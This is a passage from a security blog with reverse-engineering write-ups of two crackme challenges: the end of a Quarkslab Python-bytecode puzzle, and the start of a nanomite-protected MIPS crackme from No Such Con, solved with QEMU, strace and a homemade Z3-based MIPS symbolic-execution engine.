    ; PyObject* PyMarshal_ReadObjectFromString(char *string, Py_ssize_t len)
    0x0000000000513e00 <+112>:   call   0x4dc020 <PyMarshal_ReadObjectFromString>

    0x0000000000513e05 <+117>:   mov    rsi,rbx
    0x0000000000513e08 <+120>:   mov    rdi,rax

    ; Creates a function out of it
    0x0000000000513e0b <+123>:   call   0x52c630 <PyFunction_New>
    0x0000000000513e10 <+128>:   xor    edi,edi
    0x0000000000513e12 <+130>:   mov    rbp,rax
    0x0000000000513e15 <+133>:   call   0x478f80 <PyTuple_New>

    ; Calls it
    ; PyObject* PyObject_Call(PyObject *callable_object, PyObject *args, PyObject *kw)
    0x0000000000513e1a <+138>:   xor    edx,edx
    0x0000000000513e1c <+140>:   mov    rdi,rbp
    0x0000000000513e1f <+143>:   mov    rsi,rax
    0x0000000000513e22 <+146>:   call   0x422b40 <PyObject_Call>

Basically, the string you pass to run_me is treated as a marshaled function: it explains why you get segmentation faults when you call the function with random strings. We can just jump over that part of the function because we don't really need it so far: set $eip=0x513e27 and job done!

Second & last marshaled function

By the way I hope you are still reading -- hold tight, we are nearly done! Let's dump the function object with dpy:

-----------------------------------------------------------------------------------------------------------------------[regs]
    RAX: 0x00007FFFF7FA7050  RBX: 0x00007FFFF7F0F758  RBP: 0x00000000007B0270  RSP: 0x00007FFFFFFFE040  o d I t s Z a P c
    RDI: 0x00007FFFF7F0F758  RSI: 0x00007FFFF7FA7050  RDX: 0x0000000000000000  RCX: 0x0000000000000828  RIP: 0x0000000000513E56
    R8 : 0x0000000000880728  R9 : 0x00007FFFF7F8D908  R10: 0x00007FFFF7FA7050  R11: 0x00007FFFF7FA7050  R12: 0x00007FFFF7FD0F48
    R13: 0x00000000007EF0A0  R14: 0x00007FFFF7F3CB00  R15: 0x00007FFFF7F07ED0
    CS: 0033  DS: 0000  ES: 0000  FS: 0000  GS: 0000  SS: 002B
-----------------------------------------------------------------------------------------------------------------------[code]
=> 0x513e56 <run_me+198>:       call   0x422b40 <PyObject_Call>
-----------------------------------------------------------------------------------------------------------------------------
gdb$ dpy $rdi
function -> {'func_code': {'co_code': '\\x7c\\x00\\x00\\x64\\x01\\x00\\x6b\\x03\\x00\\x72\\x19\\x00\\x7c\\x00\\x00\\x64\\x02\\x00\\x55\\x61\\x00\\x00\\x6e\\x6e\\x00\\x7c\\x01\\x00\\x6a\\x02\\x00\\x64\\x03\\x00\\x6a\\x03\\x00\\x64\\x04\\x00\\x77\\x00\\x00\\xa0\\x05\\x00\\xc8\\x06\\x00\\xa0\\x07\\x00\\xb2\\x08\\x00\\xa0\\x09\\x00\\xea\\x0a\\x00\\xa0\\x0b\\x00\\x91\\x08\\x00\\xa0\\x0c\\x00\\x9e\\x0b\\x00\\xa0\\x0d\\x00\\xd4\\x08\\x00\\xa0\\x0e\\x00\\xd5\\x0f\\x00\\xa0\\x10\\x00\\xdd\\x11\\x00\\xa0\\x07\\x00\\xcc\\x08\\x00\\xa0\\x12\\x00\\x78\\x0b\\x00\\xa0\\x13\\x00\\x87\\x0f\\x00\\xa0\\x14\\x00\\x5b\\x15\\x00\\xa0\\x16\\x00\\x97\\x17\\x00\\x67\\x1a\\x00\\x53\\x86\\x01\\x00\\x86\\x01\\x00\\x86\\x01\\x00\\x54\\x64\\x00\\x00\\x1b',
    'co_consts': (None,
        3,
        1,
        '',
        {'co_code': '\\x8f\\x00\\x00\\x5d\\x15\\x00\\x87\\x01\\x00\\x7c\\x00\\x00\\x8f\\x01\\x00\\x64\\x00\\x00\\x4e\\x86\\x01\\x00\\x59\\x54\\x71\\x03\\x00\\x64\\x01\\x00\\x1b',
        'co_consts': (13, None),
        'co_name': '<genexpr>',
        'co_names': ('chr',),
        'co_varnames': ('.0', '_')},
        75,
        98,
        127,
        45,
        89,
        101,
        104,
        67,
        122,
        65,
        120,
        99,
        108,
        95,
        125,
        111,
        97,
        100,
        110),
    'co_name': 'foo',
    'co_names': ('True', 'quarkslab', 'append', 'join'),
    'co_varnames': ()},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'foo'}

Even before studying / disassembling the code, we see some interesting things: chr, quarkslab, append, join, etc. It definitely feels like that function is generating the flag we are looking for.

Seeing append, join and another code object (in co_consts) suggests that a generator is used to populate the variable quarkslab. We also can guess that the bunch of bytes we are seeing may be the flag encoded/encrypted -- anyway we can infer too much information to me just by dumping/looking at the object.

Let's use our magic disassembler.py to see those codes objects:

    19     >>    0 LOAD_GLOBAL              0 (True)
                3 LOAD_CONST               1 (3)
                6 COMPARE_OP               3 (!=)
                9 POP_JUMP_IF_FALSE       25

    20          12 LOAD_GLOBAL              0 (True)
                15 LOAD_CONST               2 (1)
                18 INPLACE_SUBTRACT
                19 STORE_GLOBAL             0 (True)
                22 JUMP_FORWARD           110 (to 135)

    22     >>   25 LOAD_GLOBAL              1 (quarkslab)
                28 LOAD_ATTR                2 (append)
                31 LOAD_CONST               3 ('')
                34 LOAD_ATTR                3 (join)
                37 LOAD_CONST               4 (<code object <genexpr> at 023A84A0, file "obfuscate/gen.py", line 22>)
                40 MAKE_FUNCTION            0
                43 LOAD_CONST2              5 (75)
                46 LOAD_CONST3              6 (98)
                49 LOAD_CONST2              7 (127)
                52 LOAD_CONST5              8 (45)
                55 LOAD_CONST2              9 (89)
                58 LOAD_CONST4             10 (101)
                61 LOAD_CONST2             11 (104)
                64 LOAD_CONST6              8 (45)
                67 LOAD_CONST2             12 (67)
                70 LOAD_CONST7             11 (104)
                73 LOAD_CONST2             13 (122)
                76 LOAD_CONST8              8 (45)
                79 LOAD_CONST2             14 (65)
                82 LOAD_CONST10            15 (120)
                85 LOAD_CONST2             16 (99)
                88 LOAD_CONST9             17 (108)
                91 LOAD_CONST2              7 (127)
                94 LOAD_CONST11             8 (45)
                97 LOAD_CONST2             18 (95)
            100 LOAD_CONST12            11 (104)
            103 LOAD_CONST2             19 (125)
            106 LOAD_CONST16            15 (120)
            109 LOAD_CONST2             20 (111)
            112 LOAD_CONST14            21 (97)
            115 LOAD_CONST2             22 (100)
            118 LOAD_CONST15            23 (110)
            121 BUILD_LIST              26
            124 GET_ITER
            125 CALL_FUNCTION            1
            128 CALL_FUNCTION            1
            131 CALL_FUNCTION            1
            134 POP_TOP
        >>  135 LOAD_CONST               0 (None)
            138 RETURN_VALUE
================================================================================
    22           0 LOAD_FAST                0 (.0)
        >>    3 FOR_ITER                21 (to 27)
                6 LOAD_CONST16             1 (None)
                9 LOAD_GLOBAL              0 (chr)
                12 LOAD_FAST                1 (_)
                15 LOAD_CONST               0 (13)
                18 BINARY_XOR
                19 CALL_FUNCTION            1
                22 YIELD_VALUE
                23 POP_TOP
                24 JUMP_ABSOLUTE            3
        >>   27 LOAD_CONST               1 (None)
                30 RETURN_VALUE

Great, that definitely sounds like what we described earlier.

I need a decompiler dad

Now because we really like to hack things, I decided to patch a Python decompiler to support the opcodes defined in this challenge in order to fully decompile the codes we saw so far.

I won't bother you with how I managed to do it though ; long story short: it is built it on top of fupy.py which is a readable hackable Python 2.7 decompiler written by the awesome Guillaume Delugre -- Cheers to my mate @Myst3rie for telling about this project!

So here is decompiler.py working on the two code objects of the challenge:

PS D:\Codes\ql-chall-python-2014> python .\decompiler_ql_chall.py
PART1 ====================
Robert_Forsyth = 1
True = True + 1

PART2 ====================
if True != 3:
    True = True - 1
else:
    quarkslab.append(''.join(chr(_ ^ 13) for _ in [75, 98, 127, 45, 89, 101, 104, 45, 67, 104, 122, 45, 65, 120, 99, 108, 127, 45, 95, 104, 125, 120, 111, 97, 100, 110]))

Brilliant -- time to get a flag now :-). Here are the things we need to do:

  1. Set True to 2 (so that it's equal to 3 in the part 2)
  2. Declare a list named quarkslab
  3. Jump over the middle part of the function where it will run the bytecode you gave as argument (or give a valid marshaled string that won't crash the interpreter)
  4. Profit!
overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> True = 2
>>> quarkslab = list()
>>> import do_not_run_me as v
>>> v.run_me("c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x04\x00\x00\x00d\x00\x00\x1B(\x01\x00\x00\x00N(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00rstdinrt\x01\x00\x00\x00a\x01\x00\x00\x00s\x02\x00\x00\x00\x00\x01")
>>> quarkslab
['For The New Lunar Republic']

Conclusion

This was definitely entertaining, so thanks to Serge and Quarkslab for putting this challenge together! I feel like it would have been cooler to force people to write a disassembler or/and a decompiler to study the code of run_me though ; because as I mentioned at the very beginning of the article you don't really need any tool to guess/know roughly where the flag is, and how to get it. I still did write all those little scripts because it was fun and cool that's all!

Anyway, the codes I talked about are available on my github as usual if you want to have a look at them. You can also have look at wildfire.py if you like weird/wild/whatever Python beasts!

That's all for today guys, I hope it wasn't too long and that you did enjoy the read.

By the way, we still think it would be cool to have more people posting on that blog, so if you are interested feel free to contact us!

Taming a wild nanomite-protected MIPS binary with symbolic execution: No Such Crackme

As last year, the French conference No Such Con returns for its second edition in Paris from the 19th of November until the 21th of November. And again, the brilliant Eloi Vanderbeken & his mates at Synacktiv put together a series of three security challenges especially for this occasion. Apparently, the three tasks have already been solved by awesome @0xfab which won the competition, hats off :).

To be honest I couldn't resist to try at least the first step, as I know that Eloi always builds really twisted and nice binaries ; so I figured I should just give it a go!

But this time we are trying something different though: this post has been co-authored by both Emilien Girault (@emiliengirault) and I. As we have slightly different solutions, we figured it would be a good idea to write those up inside a single post. This article starts with an introduction to the challenge and will then fork, presenting my solution and his.

As the article is quite long, here is the complete table of contents:

Table of contents:

REcon: Here be dragons

This part is just here to get things started: how to have a debugging environment, to know a bit more about MIPS and to know a bit more what the binary is actually doing.

MIPS 101

The first interesting detail about this challenge is that it is a MIPS binary ; it's really kind of exotic for me. I'm mainly looking at Intel assembly, so having the opportunity to look at an unknown architecture is always appealing. You know it's like discovering a new little toy, so I just couldn't help myself & started to read the MIPS basics.

This part is going to describe only the essential information you need to both understand and crack wide open the binary ; and as I said I am not a MIPS expert, at all. From what I have seen though, this is fairly similar to what you can see on an Intel x86 CPU:

  • It is little endian (note that it also exists a big-endian version but it won't be covered in this post),
  • It has way more general purpose registers,
  • The calling convention is similar to __fastcall: you pass arguments via registers, and get the return of the function in $v0,
  • Unlike x86, MIPS is RISC, so much simpler to take in hand (trust me on that one),
  • Of course, there is an IDA processor,
  • Linux and the regular tools also exists for MIPS so we will be able to use the "normal" tools we are used to use,
  • It also uses a stack, much less than x86 though as most of the things happening are in registers (in the challenge at least).

Setting up a proper debugging environment

The answer to that question is Qemu, as expected. You can even download already fully prepared & working Debian images on aurel32's website.

overclok@wildout:~/chall/nsc2014$ wget https://people.debian.org/~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2
overclok@wildout:~/chall/nsc2014$ wget https://people.debian.org/~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta
overclok@wildout:~/chall/nsc2014$ cat start_vm.sh
qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -vga none -append "root=/dev/sda1 console=tty0" -nographic
overclok@wildout:~/chall/nsc2014$ ./start_vm.sh
[    0.000000] Initializing cgroup subsys cpuset
[    0.000000] Initializing cgroup subsys cpu
[    0.000000] Linux version 3.2.0-4-4kc-malta ([email protected]) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 Debian 3.2.51-1
[...]
debian-mipsel login: root
Password:
Last login: Sat Oct 11 00:04:51 UTC 2014 on ttyS0
Linux debian-mipsel 3.2.0-4-4kc-malta #1 Debian 3.2.51-1 mips

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@debian-mipsel:~# uname -a
Linux debian-mipsel 3.2.0-4-4kc-malta #1 Debian 3.2.51-1 mips GNU/Linux

Feel free to install your essentials in the virtual environment, some tools might come handy (it should take a bit of time to install them though):

root@debian-mipsel:~# aptitude install strace gdb gcc python
root@debian-mipsel:~# wget https://raw.githubusercontent.com/zcutlip/gdbinit-mips/master/gdbinit-mips
root@debian-mipsel:~# mv gdbinit-mips ~/.gdbinit
root@debian-mipsel:~# gdb -q /home/user/crackmips
Reading symbols from /home/user/crackmips...(no debugging symbols found)...done.
(gdb) b *main
Breakpoint 1 at 0x402024
(gdb) r 'doar-e ftw'
Starting program: /home/user/crackmips 'doar-e ftw'
-----------------------------------------------------------------
[registers]
  V0: 7FFF6D30  V1: 77FEE000  A0: 00000002  A1: 7FFF6DF4
  A2: 7FFF6E00  A3: 0000006C  T0: 77F611E4  T1: 0FFFFFFE
  T2: 0000000A  T3: 77FF6ED0  T4: 77FE5590  T5: FFFFFFFF
  T6: F0000000  T7: 7FFF6BE8  S0: 00000000  S1: 00000000
  S2: 00000000  S3: 00000000  S4: 004FD268  S5: 004FD148
  S6: 004D0000  S7: 00000063  T8: 77FD7A5C  T9: 00402024
  GP: 77F67970  S8: 0000006C  HI: 000001A5  LO: 00005E17
  SP: 7FFF6D18  PC: 00402024  RA: 77DF2208
-----------------------------------------------------------------
[code]
=> 0x402024 <main>:     addiu   sp,sp,-72
    0x402028 <main+4>:   sw      ra,68(sp)
    0x40202c <main+8>:   sw      s8,64(sp)
    0x402030 <main+12>:  move    s8,sp
    0x402034 <main+16>:  sw      a0,72(s8)
    0x402038 <main+20>:  sw      a1,76(s8)
    0x40203c <main+24>:  lw      v1,72(s8)
    0x402040 <main+28>:  li      v0,2

And finally you should be able to run the wild beast:

root@debian-mipsel:~# /home/user/crackmips
usage: /home/user/crackmips password
root@debian-mipsel:~# /home/user/crackmips 'doar-e ftw'
WRONG PASSWORD

Brilliant :-).

The big picture

Now that we have a way of both launching and debugging the challenge, we can open the binary in IDA and start to understand what type of protection scheme is used. As always at that point, we are really not interested in details: we just want to understand how it works and what parts we will have to target to get the good boy message.

After a bit of time in IDA, here is how works the binary:

  1. It checks that the user supplied one argument: the serial
  2. It checks that the supplied serial is 48 characters long
  3. It converts the string into 6 DWORDs (/!\ pitfall warning: the conversion is a bit strange, be sure to verify your algorithm)
  4. The beast forks in two:
    1. [Father] It seems, somehow, this one is driving the son, more on that later
    2. [Son] After executing a big chunk of code that modifies (in place) the 6 original DWORDs, they get compared against the following string [ Synacktiv + NSC = <3 ]
    3. [Son] If the comparison succeeds you win, else you loose

Basically, we need to find the 6 input DWORDs that are going to generate the following ones in output: 0x7953205b, 0x6b63616e, 0x20766974, 0x534e202b, 0x203d2043, 0x5d20333c. We also know that the father is going to interact with its son, so we need to study both codes to be sure to understand the challenge properly. If you prefer code, here is the big picture in C:

int main(int argc, char *argv[])
{
    DWORD serial_dwords[6] = {0};
    if(argc != 2)
        Usage();

    // Conversion
    a2i(argv[1], serial_dwords);

    pid_t pid = fork();
    if(pid != 0)
    {
        // Father
        // a lot of stuff going on here, we will see that later on
    }
    else
    {
        // Son
        // a lot of stuff going on here, we will see that later on

        char *clear = (char*)serial_dwords;
        bool win = memcmp(clear, "[ Synacktiv + NSC = <3 ]", 48);
        if(win)
            GoodBoy();
        else
            BadBoy();
    }
}

Let's get our hands dirty

Father's in charge

The first thing I did after having the big picture was to look at the code of the father. Why? The code seemed a bit simpler than the son's one, so I figured studying the father would make more sense to understand what kind of protection we need to subvert. You can even crank up strace to have a clearer overview of the syscalls used:

root@debian-mipsel:~# strace -i /home/user/crackmips $(python -c 'print "1"*48')
[7734e224] execve("/home/user/crackmips", ["/home/user/crackmips", "11111111111111111111111111111111"...], [/* 12 vars */]) = 0
[...]
[77335e70] clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x77491068) = 2539
[77335e70] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7733557c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[7737052c] --- SIGCHLD (Child exited) @ 0 (0) ---
[7733557c] waitpid(2539, [{WIFSTOPPED(s) && WSTOPSIG(s) == SIGTRAP}], __WALL) = 2539
[7737052c] ptrace(PTRACE_GETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_SETREGS, 2539, 0, 0x7f8f87c4) = 0
[7737052c] ptrace(PTRACE_CONT, 2539, 0, SIG_0) = 0
[...]

That's an interesting output that I didn't expect at all actually. What we are seeing here is the father driving its son by modifying, potentially (we will find out that later), its context every time the son is SIGTRAPing (note waitpid second argument).

From here, if you are quite familiar with the different existing type of software protections (I'm not saying I am an expert in this field but I just happened to know that one :-P) you can pretty much guess what that is: nanomites this is!

Nanomites 101

Namomites are quite a nice protection. Though, it is quite a generic name ; you can really use that protection scheme in whatever way you like: your imagination is the only limit here. To be honest, this was the first time I saw this kind of protection implemented on a Unix system ; really good surprise! It usually works this way:

  1. You have two processes: a driver and a driven ; a father and a son
  2. The driver is attaching itself to the driven one with the debug APIs available on the targeted platform (ptrace here, and CreateProcess/DebugActiveProcess on Windows)
    1. Note that, by design you won't be able to attach yourself to the son as both Windows and Linux prevent that (by design): some people call that part the DebugBlocker
    2. You will able to debug the driver though
  3. Usually the interesting code is in the son, but again you can do whatever you want. Basically, you have two rules if you want an efficient protection:
    1. Make sure the driven process can't run without its driver and that they are really tied to each other
    2. The strength of the protection is that strong/intimate bound between the two processes
    3. Design your algorithm such that removing the driver is really difficult/painful/driving mad the attacker
  4. The driven process can call/notify the driver by just SIGTRAPing with an int3/break instruction for example

As I said, I see this protection scheme more like a recipe: you are free to customize it at your convenience really. If you want to read more on the subject, here is a list of links you should check out:

How the father works

Now it is time to took into details the father ; here is how it works:

  • The first thing it does is to waitpid until its son triggers a SIGTRAP
  • The driver retrieves the CPU context of the son process and more precisely its program counter: $pc
  • Then we have a huge block of arithmetic computations. But after spending a bit of time to study it, we can see that huge block as a black-box function that takes two parameters: the program counter of the son and some kind of counter value (as this code is going to be executed in a loop, for each SIGTRAP this variable is going to be incremented). It generates a single output which is a 32 bits value that I call the first magic value. Let's not focus on what the block is actually doing though, we will develop some tool in the next part to deal with that :-) so let's keep moving!

father_code.png
* This magic value is then used to find a specific entry in an array of QWORDs (606 QWORDs which is 6 times the number of break instructions in the son -- you will understand that a bit later don't worry). Basically, the code is going to loop over every single QWORD of this array until finding one that has the high DWORD equals to the magic value. From there you get another magic value which is the lowest DWORD of the matching QWORD. * Another huge block of arithmetic computations is used. Similarly to the first one, we can see it as a black-box function with two inputs: the second magic value and a round index (the son is executing its code 6 times, so this round index will start from 0 until 5 -- again this will be a bit clearer when we look at the son, so just keep this detail in your mind). The output of this function is a 32 bits value. Again, do not study this block, we don't need it. * The generated value is in fact a valid code address inside the son ; so straight after the computation, the father is going to modify the program counter in the previously retrieved CPU context. Once this is done, it calls ptrace with SETREGS to set the new CPU context of the son.

This is what roughly is going to be executed every time the son is going to hit a break instruction ; the father is definitely driving the son. And we can feel it now, the son is going to jump (via its father) through block of codes that aren't (necessary) contiguous in memory, so studying the son code as it is in IDA is quite pointless as those basic blocks aren't going to be executed in this order.

Long story short, the nanomites are used as some kind of runtime code flow scrambling primitive, isn't it exciting? Told you that @elvanderb is crazy :-).

Gearing up: Writing a symbolic executing engine

At that point, I can assure you that we need some tooling: we have studied the binary, we know how the main parts work and we just need to extract the different equations/formulas used by both the computation of the son's program counter and the serial verification algorithm. Basically the engine is going to be useful to study both the father and the son.

If you are not really familiar with symbolic execution, I recommend you take a little bit of time to read Breaking Kryptonite's Obfuscation: A Static Analysis Approach Relying on Symbolic Execution and check out z3-playground if you are not really familiar with Z3 and its Python bindings.

This time I decided to not build that engine as an IDA Python script, but just to do everything myself. Do not be afraid though, even if it sounds scary it is really not: the challenge is a perfect environment for those kind of things. It doesn't use a lot of instructions, we don't need to support branches and nearly only arithmetic instructions are used.

I also chose to implement this engine in a way that we can also use it as a simple emulator. You can even use it as a decompiler if you want! The two other interesting points for us are:

  1. Once we run a piece of code in the symbolic engine, we will extract certain computations / formulas. Thanks to Microsoft's Z3 we will be able to retrieve input values that will generate specific output values: this is basically what you gain by using a solver and symbolic variables.
  2. But the other interesting point is that you still can use the extracted Z3 expressions as some kind of black-box functions. You know what the function is doing, kind of, but you don't know how ; and you are not interested in the how. You know the inputs, and the outputs. To obtain a concrete output value, you can just replace the symbolic variables by concrete values. This is really handy, especially when you are not only interested in finding input values to generate specific output values ; sometimes you just want to go both ways :-).

Anyway, after this long theoretical speech let's have a look at some code. The first important job of the engine is to be able to parse MIPS assembly: fortunately for us this is really easy. We are directly feeding plain-text MIPS disassembly directly copied from IDA to our engine:

def _parse_line(self, line):
  addr_seg, instr, rest = line.split(None, 2)
  args = rest.split(',')
  for i in range(len(args)):
    if '#' in args[i]:
        args[i], _ = args[i].split(None, 1)

  a0, a1, a2 = map(
    lambda x: x.strip().replace('$', '') if x is not None else x,
    args + [None]*(3 - len(args))
  )
  _, addr = addr_seg.split(':')
  return int(addr, 16), instr, a0, a1, a2

From here you have all the information you need: the instruction and its operands (None if an operand doesn't exist as you can have up to 3 operands). The other important job that follows is to handle the different type of operands ; here are the ones I encountered in the challenge:

  • General purpose register,
  • Stack-variable,
  • Immediate value.

To handle / convert those I created a bunch of dull / helper functions:

def _is_gpr(self, x):
  '''Is it a valid GPR name?'''
  return x in self.gpr

def _is_imm(self, x):
  '''Is it a valid immediate?'''
  x = x.replace('loc_', '0x')
  try:
    int(x, 0)
    return True
  except:
    return False

def _to_imm(self, x):
  '''Get an integer from a string immediate'''
  if self._is_imm(x):
    x = x.replace('loc_', '0x')
    return int(x, 0)
  return None

def _is_memderef(self, x):
  '''Is it a memory dereference?'''
  return '(' in x and ')' in x

def is_stackvar(self, x):
  '''Is is a stack variable?'''
  return ('(fp)' in x and '+' in x) or ('var_' in x and '+' in x)

def to_stackvar(self, x):
  '''Get the stack variable name'''
  _, var_name = x.split('+')
  return var_name.replace('(fp)', '')

Finally, we have to handle every different instructions and their encodings. Of course, you need to implement only the instructions you want: most likely the ones that are used in the code you are interested int. In a nutshell, this is the core of the engine. You can also use it to output valid Python/C lines if you fancy having a decompiler in your sleeve ; might be handy right?

This is what the core function looks like, it is really simple, dumb and so unoptimized ; but at least it's clear to me:

def step(self):
  '''This is the core of the engine -- you are supposed to implement the semantics
  of all the instructions you want to emulate here.'''
  line = self.code[self.pc]
  addr, instr, a0, a1, a2 = self._parse_line(line)
  if instr == 'sw':
    if self._is_gpr(a0) and self.is_stackvar(a1) and a2 is None:
      var_name = self.to_stackvar(a1)
      self.logger.info('%s = $%s', var_name, a0)
      self.stack[var_name] = self.gpr[a0]
    elif self._is_gpr(a0) and self._is_memderef(a1) and a2 is None:
      idx, base = a1.split('(')
      base = base.replace('$', '').replace(')', '')
      computed_address = self.gpr[base] + self._to_imm(idx)
      self.logger.info('[%s + %s] = $%s', base, idx, a0)
      self.mem[computed_address] = self.gpr[a0]
    else:
      raise Exception('sw not implemented')
  elif instr == 'lw':
    if self._is_gpr(a0) and self.is_stackvar(a1) and a2 is None:
      var_name = self.to_stackvar(a1)
      if var_name not in self.stack:
        self.logger.info(' WARNING: Assuming %s was 0', (var_name, ))
        self.stack[var_name] = 0
      self.logger.info('$%s = %s', a0, var_name)
      self.gpr[a0] = self.stack[var_name]
    elif self._is_gpr(a0) and self._is_memderef(a1) and a2 is None:
      idx, base = a1.split('(')
      base = base.replace('$', '').replace(')', '')
      computed_address = self.gpr[base] + self._to_imm(idx)
      if computed_address not in self.mem:
        value = raw_input(' WARNING %.8x is not in your memory store -- what value is there @0x%.8x?' % (computed_address, computed_address))
      else:
        value = self.mem[computed_address]
      self.logger.info('$%s = [%s+%s]', a0, idx, base)
      self.gpr[a0] = value
    else:
      raise Exception('lw not implemented')
[...]

The first level of if handles the different instructions, the second level of if handles the different encodings an instruction can have. The self.logger thingy is just my way to save the execution traces in files to let the console clean:

def __init__(self, trace_name):
  self.gpr = {
    'zero' : 0,
    'at' : 0,
    'v0' : 0,
    'v1' : 0,
# [...]
    'lo' : 0,
    'hi' : 0
  }

  self.stack = {}
  self.pc = 0
  self.code = []
  self.mem = {}
  self.stack_offsets = {}
  self.debug = False
  self.enable_z3 = False

  if os.path.exists('traces') == False:
      os.mkdir('traces')

  self.logger = logging.getLogger(trace_name)
  h = logging.FileHandler(
      os.path.join('traces', trace_name),
      mode = 'w'
  )

  h.setFormatter(
      logging.Formatter(
          '%(levelname)s: %(asctime)s %(funcName)s @ l%(lineno)d -- %(message)s',
          datefmt = '%Y-%m-%d %H:%M:%S'
      )
  )

  self.logger.setLevel(logging.INFO)
  self.logger.addHandler(h)

At that point, if I wanted only an emulator I would be done. But because I want to use Z3 and symbolic variables I want to get your attention on two common pitfalls that can cost you hours of debugging (trust me on that one :-():

  • The first one is that the operator __rshift__ isn't the logical right shift but the arithmetical one; which is quite different and can generate results you don't expect:
In [1]: from z3 import *

In [2]: simplify(BitVecVal(4, 3) >> 1)
Out[2]: 6

In [3]: simplify(LShR(BitVecVal(4, 3), 1))
Out[3]: 2

In [4]: 4 >> 1
Out[4]: 2

To workaround that I usually define my own _LShR function that does whatever is correct according to the operand types (yes we could also replace z3.BitVecNumRef.__rshift__ by LShR directly):

def _LShR(self, a, b):
  '''Useful hook function if you want to run the emulation
  with/without Z3 as LShR is different from >> in Z3'''
  if self.enable_z3:
    if isinstance(a, long) or isinstance(a, int):
      a = BitVecVal(a, 32)
    if isinstance(b, long) or isinstance(b, int):
      b = BitVecVal(b, 32)
    return LShR(a, b)
  return a >> b
  • The other interesting detail to keep in mind is that you can't have any overflow on BitVecs of the same size ; the result is automatically truncated. So if you happen to have mathematical operations that need to overflow, like a multiplication (this is used in the challenge), you should store the temporary result in a bigger temporary variable. In my case, I was supposed to store the overflow inside another register, $hi which is used to store the high DWORD part of the result. But because I wasn't storing the result in a bigger BitVec, $hi ended up always equal to zero which is quite a nice problem when you have to pinpoint this issue in thousands lines of assembly :-).
elif instr == 'multu':
  if self._is_gpr(a0) and self._is_gpr(a1) and a2 is None:
    self.logger.info('$lo = ($%s * $%s) & 0xffffffff', a0, a1)
    self.logger.info('$hi = ($%s * $%s) >> 32', a0, a1)
    if self.enable_z3:
      a0bis, a1bis = self.gpr[a0], self.gpr[a1]
      if isinstance(a0bis, int) or isinstance(a0bis, long):
        a0bis = BitVecVal(a0bis, 32)
      if isinstance(a1bis, int) or isinstance(a1bis, long):
        a1bis = BitVecVal(a1bis, 32)

      a064 = ZeroExt(32, a0bis)
      a164 = ZeroExt(32, a1bis)
      r = a064 * a164
      self.gpr['lo'] = Extract(31, 0, r)
      self.gpr['hi'] = Extract(63, 32, r)
  else:
    x = self.gpr[a0] * self.gpr[a1]
    self.gpr['lo'] = x & 0xffffffff
    self.gpr['hi'] = self._LShR(x, 32)

I think this is it really, you can now impress girls with your brand new shiny toy, check this out:

def main(argc, argv):
    print '=' * 50
    sym = MiniMipsSymExecEngine('donotcare.log')
